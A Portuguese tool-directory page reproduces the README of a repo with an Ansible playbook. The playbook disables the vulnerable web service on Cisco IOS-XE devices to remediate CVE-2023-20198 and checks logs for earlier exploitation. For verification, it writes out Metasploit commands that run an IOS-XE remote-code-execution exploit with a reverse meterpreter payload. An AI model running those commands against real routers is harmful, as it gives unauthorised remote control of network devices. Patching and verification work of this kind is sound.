Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-20198-Fix — Verificar e corrigir condições que tornam um dispositivo IOS-XE vulnerável ao CVE-2023-20198 | Kitploit
Ferramentas/GitHubGitHub/netbell/cve-2023-20198-fix
Scanners de VulnerabilidadesExploraçãoAuditoria de ConfiguraçãoSegurança de RedeDevSecOpsResposta a Incidentes
GitHubnetbell/cve-2023-20198-fix

CVE-2023-20198-Fix

Verificar e corrigir condições que tornam um dispositivo IOS-XE vulnerável ao CVE-2023-20198

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Correção do CVE-2023-20198

Este repositório contém um playbook Ansible para remediar a vulnerabilidade CVE-2023-20198 encontrada em determinados dispositivos Cisco.

Ele faz o seguinte:

  1. Verifica se o serviço web está em execução no roteador, verificando os comandos associados na configuração em execução
  2. Desativa o serviço web se estiver em execução
  3. Salva a configuração se alterada
  4. Verifica os logs em busca de sinais de exploração anterior

Estrutura de Diretórios:

root@kitploit:~
CVE-2023-20198-Fix/
│
├── ansible.cfg            # Ansible configuration file
├── group_vars/            # Directory for variables specific to groups of hosts
│   └── iosxe_devices.yml  # Variable definitions for IOS-XE devices
├── inventory.yml          # Inventory of hosts, including devices to target
└── remediate.yml          # Playbook for remediating CVE-2023-20198

Primeiros Passos

Pré-requisitos

Certifique-se de ter o Ansible instalado na sua máquina de controle. Este playbook foi escrito para Ansible 2.9 ou mais novo.

Configuração

Configure o Ansible: Edite o ansible.cfg para corresponder às configurações do seu ambiente.

Inventário:

Atualize o inventory.yml com os detalhes do host dos seus dispositivos IOS-XE.

Variáveis:

Defina quaisquer variáveis necessárias em group_vars/iosxe_devices.yml. Isso deve incluir quaisquer configurações comuns para seus dispositivos IOS-XE, como configurações de conexão e credenciais.

Adicionando Hosts ao Inventário

Para adicionar um novo dispositivo IOS-XE ao inventário, edite o arquivo inventory.yml e acrescente o novo host sob o grupo apropriado:

root@kitploit:~
iosxe_devices:
  hosts:
    vulnerable_router01:
      ansible_host: 192.168.1.3
      # ... other necessary variables

Substitua new_router01 pelo nome do host do seu dispositivo e as variáveis ansible_* pelos valores reais do seu dispositivo.

Atualizando Variáveis de Grupo

Se precisar atualizar credenciais ou outras configurações para o grupo de dispositivos IOS-XE, edite o arquivo group_vars/iosxe_devices.yml:

root@kitploit:~
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password            # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password     # Lab use only, store credentials responsibly!
# ... other variables

Executando o Playbook

Para executar o playbook, use o seguinte comando:

root@kitploit:~
ansible-playbook remediate.yml -i inventory.yml

Verificação com Metasploit

Comandos do MSF6

root@kitploit:~
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242     # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit

Verificação pré-remediação

Antes

Execução do Playbook

Execução

Verificação pós-remediação

Depois

Testes

Sempre teste suas alterações em um ambiente controlado antes de executar o playbook em produção.

Segurança

Armazene dados sensíveis, como senhas e chaves secretas, usando o Ansible Vault. Não armazene credenciais em texto simples nos arquivos de inventário ou group_vars.

Para medidas de segurança adicionais e melhores práticas, consulte a documentação oficial do Ansible.

Por favor, substitua todos os valores de espaço reservado por dados reais que correspondam ao seu ambiente. Este README pressupõe familiaridade básica com conceitos do Ansible, como inventário, variáveis e execução de playbooks.

Baixar ferramenta